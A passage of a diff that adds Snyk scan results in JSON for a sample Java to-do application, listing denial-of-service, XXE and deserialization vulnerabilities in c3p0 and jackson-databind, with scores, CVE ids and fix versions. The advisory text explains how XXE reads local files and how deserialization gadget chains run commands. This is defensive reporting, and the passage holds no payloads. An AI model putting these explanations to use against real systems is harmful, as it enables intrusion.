"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## 